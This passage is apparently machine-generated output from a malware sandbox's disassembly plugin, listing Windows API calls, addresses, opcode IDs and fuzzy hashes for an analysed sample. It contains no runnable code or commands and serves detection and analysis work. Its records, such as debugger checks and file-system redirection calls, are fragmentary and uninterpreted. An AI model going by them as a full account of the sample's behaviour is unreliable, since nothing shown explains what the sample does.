                                        • GetLastError.KERNEL32(?,007297CA,FF8BC369,00000000,00000002,00000000,?,00725EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00716F61), ref: 0072975E
                                        • __dosmaperr.LIBCMT ref: 00729765
                                        Similarity
                                        • API ID: ErrorFileLastPointer__dosmaperr
                                        • String ID:
                                        • API String ID: 2336955059-0
                                        • Opcode ID: 09bb29bdc21466ada50da13aa50d3be4811fc13260e0e06cddaf780d376ad9f4
                                        • Instruction ID: b8cb010fd869018338a2d3f86e8a364968275a92380ae903ac75bb55872be19a
                                        • Opcode Fuzzy Hash: 09bb29bdc21466ada50da13aa50d3be4811fc13260e0e06cddaf780d376ad9f4
                                        • Instruction Fuzzy Hash: B8014C32620128EBCB059FA9EC09CAE3B3ADF85330F280219F9159B3D1EA74DD418790
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 00702FB6
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: CALL
                                        • API String ID: 1385522511-4196123274
                                        • Opcode ID: 10e6866a05da241c42f5800d4b2d25f00afd2a8556caa8ca3a693d7effaf6b50
                                        • Instruction ID: 6db77b4ae3cc5a7e011f01b8c5ba688539587843ea05b9c877390ce81d08d49e
                                        • Opcode Fuzzy Hash: 10e6866a05da241c42f5800d4b2d25f00afd2a8556caa8ca3a693d7effaf6b50
                                        • Instruction Fuzzy Hash: 6C229D71608201DFC714DF14C488B2ABBF5BF85314F148A5DF4968B3A2D779E986CB92
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,006F33E9,007C2418,?,?,?,?,?,?,?,006F32EF,?), ref: 006F4227
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        Similarity
                                        • API ID: FullNamePath_wcslen
                                        • String ID: $|
                                        • API String ID: 4019309064-1282033709
                                        • Opcode ID: 4e495c603c043f6090d7e86a9c7929ad5fed80c2fdfeae343edc748221092a78
                                        • Instruction ID: bd1706fb5a3d5594cc940bdfa743bb54ada9447b1cc724a39001db2ff7371932
                                        • Opcode Fuzzy Hash: 4e495c603c043f6090d7e86a9c7929ad5fed80c2fdfeae343edc748221092a78
                                        • Instruction Fuzzy Hash: 7A11C83150420C9BCB54EBA49801EEE73FEAF08350F0040B9F645D76D2DE78EB858B15
                                        APIs
                                        • GetComputerNameW.KERNEL32(?,?), ref: 0074E6F3
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID: X64
                                        • API String ID: 3545744682-893830106
                                        • Opcode ID: a7bcfc772df194f7ced015466ee63a02598ab7141ddfa8842b6a913c8993b155
                                        • Instruction ID: 141786918f90164cd75aac3dbf66dc4a975f97075968143043c651bf1fba7631
                                        • Opcode Fuzzy Hash: a7bcfc772df194f7ced015466ee63a02598ab7141ddfa8842b6a913c8993b155
                                        • Instruction Fuzzy Hash: 79D0C9B5805228EACBA0DF80DC88DDDB3BCBB14310F204956F402A2040D73869489B11
                                        APIs
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00769665
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00769673
                                        Similarity
                                        • API ID: PrivateProfileStringWrite$FullNamePath
                                        • String ID:
                                        • API String ID: 3876400906-0
                                        • Opcode ID: 8effd2d78f65497dd879e8f29794eed8abe238df51f7f9aa82c3d14722864f61
                                        • Instruction ID: 8d7716db723c89d79d6baab7efd76afb02562ffaba7ce7316c03ff7602aa6f8a
                                        • Opcode Fuzzy Hash: 8effd2d78f65497dd879e8f29794eed8abe238df51f7f9aa82c3d14722864f61
                                        • Instruction Fuzzy Hash: 7A1119796006299FCB10EB64C840D7EB7B6FF48360B058488ED56AB362CB34FD01CB94
                                        APIs
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,006F3B33,?,00008000), ref: 006F6E80
                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,006F3B33,?,00008000), ref: 007359A2
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: deac52e0baf28da55e3f06ca612472128044507e7863e387ce774f4c3067a4af
                                        • Instruction ID: 1f3ed0c35dcb1330e6693465cdf07eb5522a775e77fc150d38cebaaf9ce5c65c
                                        • Opcode Fuzzy Hash: deac52e0baf28da55e3f06ca612472128044507e7863e387ce774f4c3067a4af
                                        • Instruction Fuzzy Hash: 3901B532149229B6E3700A26CC0EFA77F99EF06770F10C310BE98AA1E0C7B45855CB94
                                        APIs
                                        • IsThemeActive.UXTHEME ref: 006F32C4
                                          • Part of subcall function 006F326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 006F3282
                                          • Part of subcall function 006F326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006F3299
                                          • Part of subcall function 006F3312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006F32EF,?), ref: 006F3342
                                          • Part of subcall function 006F3312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006F32EF,?), ref: 006F3355
                                          • Part of subcall function 006F3312: GetFullPathNameW.KERNEL32(00007FFF,?,?,007C2418,007C2400,?,?,?,?,?,?,006F32EF,?), ref: 006F33C1
                                          • Part of subcall function 006F3312: SetCurrentDirectoryW.KERNELBASE(?,00000001,007C2418,?,?,?,?,?,?,?,006F32EF,?), ref: 006F3442
                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 006F32FE
                                        Similarity
                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                        • String ID:
                                        • API String ID: 1550534281-0
                                        • Opcode ID: 8d71bd09ec1f5d4d47809fafeb93138b7a8b02a14aef3e57dc6d95f4b252a602
                                        • Instruction ID: 3460913f54872c07c3521fe1cb0bb73a461186159c62cd3d622d88a9c43b4627
                                        • Opcode Fuzzy Hash: 8d71bd09ec1f5d4d47809fafeb93138b7a8b02a14aef3e57dc6d95f4b252a602
                                        • Instruction Fuzzy Hash: 38F05EB25547C8DFE300AF64EC0AF643B91A704709F10C82EB609862E3CFBE85528B18
                                        Similarity
                                        • API ID: SleepTimetime
                                        • String ID:
                                        • API String ID: 346578373-0
                                        • Opcode ID: 1c7ca635282cace0f7b3f18d2d2e16dc159b456c9f0eb4357cfa2b63558c0fd4
                                        • Instruction ID: fd0a03a5eee7640f6dad41c4992eaeedea12f05bdb47e0a88b1936e8abf51221
                                        • Opcode Fuzzy Hash: 1c7ca635282cace0f7b3f18d2d2e16dc159b456c9f0eb4357cfa2b63558c0fd4
                                        • Instruction Fuzzy Hash: 97F082712406099FD354EF65D509B66B7E6FF45360F00402DE55AC73A0DB74AC00CB95
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,006FAE65,?,?,?), ref: 006F8793
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,006FAE65,?,?,?), ref: 006F87C9
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 626452242-0
                                        • Opcode ID: 071f83ad427a2a91215504cfbfe34bf18236246152e5f619a49535da272904bd
                                        • Instruction ID: 5f3d66c2a85f634207a48c0287d97e3cfcd2ccb8f744e721f59e019b60175fb8
                                        • Opcode Fuzzy Hash: 071f83ad427a2a91215504cfbfe34bf18236246152e5f619a49535da272904bd
                                        • Instruction Fuzzy Hash: E301FC713401087FEB1867699C4BFBF7AAEDF84740F10407DB101DA1D0DDA09C005264
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 543893691077792d9c552353462efd9b74dc6f0e4ce5f5f9cc64d3cccc94f463
                                        • Instruction ID: 76917b4ea49cfb35e22276f3349ea36db4a23c9883a270ce248a6f8e8645d588
                                        • Opcode Fuzzy Hash: 543893691077792d9c552353462efd9b74dc6f0e4ce5f5f9cc64d3cccc94f463
                                        • Instruction Fuzzy Hash: F9519475A00118AFDB10DF6CC845AED7BB1BF85364F198168E8489B3D2D779ED82CB90
                                        APIs
                                        • CharLowerBuffW.USER32(?,?), ref: 0075FBE3
                                        Similarity
                                        • API ID: BuffCharLower
                                        • String ID:
                                        • API String ID: 2358735015-0
                                        • Opcode ID: 28171a37f56af956831faeb7ebed3be022d5537131cff35aeb1a3861afa9e76e
                                        • Instruction ID: 454f9609a1852722f583ea9d600e76c00a3911605aa43c442e75ccf07703f816
                                        • Opcode Fuzzy Hash: 28171a37f56af956831faeb7ebed3be022d5537131cff35aeb1a3861afa9e76e
                                        • Instruction Fuzzy Hash: 4A41A6B660020DAFDB11EF68C8859EE77B9EF44311B11453EED1697241EBB4DA48CBA0
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: 386ba7e2d939efac2623218cfa49e5f31cadd8a3cbd8d9aa75eb9f76ee1bd713
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: FA31D374A00105DFC718DF5CC480AA9F7A6FB59300B6886A5E40ACB396D7BAEDC1CBD0
                                        APIs
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00768EBE
                                        Similarity
                                        • API ID: FullNamePathPrivateProfileString
                                        • String ID:
                                        • API String ID: 1991638491-0
                                        • Opcode ID: 093336b7fca411e043af7a513c6f63933fb7a33de50e231fdd3ac0d5704721a2
                                        • Instruction ID: bd7942543f270ad2a2e96c4aedd40d987fa074a260c60d58c32193b8c8c63aca
                                        • Opcode Fuzzy Hash: 093336b7fca411e043af7a513c6f63933fb7a33de50e231fdd3ac0d5704721a2
                                        • Instruction Fuzzy Hash: 9F214235600609AFCB10EB54C845CAEB7B6EF49760B044058FA45A73A1CB34BD81DBD4
                                        APIs
                                          • Part of subcall function 006F6332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F633E
                                          • Part of subcall function 006F6332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006F6350
                                          • Part of subcall function 006F6332: FreeLibrary.KERNEL32(00000000,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6362
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F639F
                                          • Part of subcall function 006F62FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,007354C3,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6304
                                          • Part of subcall function 006F62FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006F6316
                                          • Part of subcall function 006F62FB: FreeLibrary.KERNEL32(00000000,?,?,007354C3,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6329
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressFreeProc
                                        • String ID:
                                        • API String ID: 2632591731-0
                                        • Opcode ID: 15b1e8fcdcdec480db0e0da1c7ccc3056f6a1b8412ad6f5569fa37dfda3c1dc7
                                        • Instruction ID: 72e617bc65d6d7e5b6937560faccfdfc7b0ec76e06c1750ec3d7001b51343d14
                                        • Opcode Fuzzy Hash: 15b1e8fcdcdec480db0e0da1c7ccc3056f6a1b8412ad6f5569fa37dfda3c1dc7
                                        • Instruction Fuzzy Hash: D711273264020CAACB14BB74C803ABD77A3AF51711F10842DFA83A60C1DEB49E459754
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        • Opcode ID: 8e61ddf9fc01dbd03e28ee46038f6cba59fbb20680c904fe541e08d720895700
                                        • Instruction ID: d91de844cb2268526d6d23d0cba310d7e5c31cf928c9893f69b6df6fe31ee89e
                                        • Opcode Fuzzy Hash: 8e61ddf9fc01dbd03e28ee46038f6cba59fbb20680c904fe541e08d720895700
                                        • Instruction Fuzzy Hash: 2911487190410AAFCF05DF98E94099E7BF9EF48310F104069F808AB312DA35EA218BA5
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,006F6B73,?,00010000,00000000,00000000,00000000,00000000), ref: 006FB0AC
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 75d6dd57480013dfbfa4ad11a4eadc3456cf460811fa7a554d83103999341d55
                                        • Instruction ID: 68fccb581fa3053e3b10f119fb201c06ed7d799b012538ec047996354d845e44
                                        • Opcode Fuzzy Hash: 75d6dd57480013dfbfa4ad11a4eadc3456cf460811fa7a554d83103999341d55
                                        • Instruction Fuzzy Hash: B2113A31204709EFD7308F15C480BA7B7EAEF44754F10C42DEAAA87A50CBB1E945CB64
                                        APIs
                                          • Part of subcall function 0072500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,007231B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 0072504E
                                        • _free.LIBCMT ref: 007253FC
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: fba82c0aa068c5562b6699b73bb903d727f3ae0d836859c59312de60e55cd848
                                        • Instruction ID: 776243d3668401e9f78cdcc1aee6ab3fdb2432442f54257a8554f07e2e8a7c3f
                                        • Opcode Fuzzy Hash: fba82c0aa068c5562b6699b73bb903d727f3ae0d836859c59312de60e55cd848
                                        • Instruction Fuzzy Hash: 380149B2204715ABE731CF65E885A5AFBDCEB89370F25061DE1C4832C1EA74A905CB74
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                        • Instruction ID: c1219078b3f4b1916bc53fd76a5790d84143624a611e07d002747061152d728e
                                        • Opcode Fuzzy Hash: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                        • Instruction Fuzzy Hash: 14F0A932501634DAD7313E6EAC09BDA36589F41334F144715FC65961D1EF7CE9828693
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,007231B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 0072504E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 17731e06280e4d409bfc38afc1f147c1c6c75f9ef22a857f7c172deeded12d50
                                        • Instruction ID: a2af1c971ed990f9d21eb23b18069d5f569557fc4d604f874a94bc6c88416645
                                        • Opcode Fuzzy Hash: 17731e06280e4d409bfc38afc1f147c1c6c75f9ef22a857f7c172deeded12d50
                                        • Instruction Fuzzy Hash: 6CF0BE32A00A34ABDB311A76AC09E9A3758BF807A1B188125E815961D1CA3CDC4086E0
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A99,?,0000015D,?,?,?,?,007185D0,000000FF,00000000,?,?), ref: 00723BE2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 657696305f1575f0b75acbecfe30fea71ddd88921a14de60d2580ab8fede031e
                                        • Instruction ID: 0eafd27d7c5fca6da5ac98d88a6f60af857feb0d894db97c5ff19a923ae957cf
                                        • Opcode Fuzzy Hash: 657696305f1575f0b75acbecfe30fea71ddd88921a14de60d2580ab8fede031e
                                        • Instruction Fuzzy Hash: 2DE0EDB120427897E7202F6ABC08F9A3668EF41BA0F150221FC06D20D0DB2CDE4082E0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf04ce699b3e486041dada1d904dbd38ed6598a35282de05cb8c51e85cd8dfcd
                                        • Instruction ID: be2777d12757969ef9e2f5eb466c6146229b674e5d45ffe4e133c0df1b603083
                                        • Opcode Fuzzy Hash: cf04ce699b3e486041dada1d904dbd38ed6598a35282de05cb8c51e85cd8dfcd
                                        • Instruction Fuzzy Hash: 9BF03972501716DFDB349F64D494862BBE6FF1432A324893EE2D783621C735A884DF50
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID:
                                        • API String ID: 2638373210-0
                                        • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                        • Instruction ID: c96ec22758aff40bff690ba07082f1cbb5e0929b19bc62ef877678328e3b2d75
                                        • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                        • Instruction Fuzzy Hash: 54F0D47150020DFBDF05DF94C941AAEBB7AFB04318F208445F9159A152D336EA61EBA1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID:
                                        • API String ID: 176396367-0
                                        • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                        • Instruction ID: 72a1a14ff19552d82b7b0693a35d80562c9312d63cc7c8090f9b4c49147c7612
                                        • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                        • Instruction Fuzzy Hash: BAD05E2234201075A769213D2D0FCBF455CCBC2BA0B04003EFA02CA1E5EC484C8200E0
                                        APIs
                                        • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 0075E7A2
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: NamePathShort_wcslen
                                        • String ID:
                                        • API String ID: 2021730007-0
                                        • Opcode ID: 3f539004dea24c5fa5d3d80cf2304d5255de34cb95408feaa6583b2018d2d694
                                        • Instruction ID: 1aaaa9263a09fe712f372ee975c714b94aa08a7ef111307584de190569dd38df
                                        • Opcode Fuzzy Hash: 3f539004dea24c5fa5d3d80cf2304d5255de34cb95408feaa6583b2018d2d694
                                        • Instruction Fuzzy Hash: FBE0CD725402245BCB2092589C05FEA77DDFFC8790F0540B4FD05D7259DD64ED808694
                                        APIs
                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006F39FD
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: LongNamePath_wcslen
                                        • String ID:
                                        • API String ID: 541455249-0
                                        • Opcode ID: 377209443c529dc94fad23277ad3ffad3e1a266f224717cfaff80a709b56e663
                                        • Instruction ID: df60bc98d3cff54259d4787beb3969abdedb0fbfd9a65987d9e5a66855ce9bcf
                                        • Opcode Fuzzy Hash: 377209443c529dc94fad23277ad3ffad3e1a266f224717cfaff80a709b56e663
                                        • Instruction Fuzzy Hash: D7E0CD725001245BC720A2589C05FEA77DDEFC8790F0540B5FD05D7259DD64DD808694
                                        APIs
                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0075E76C
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
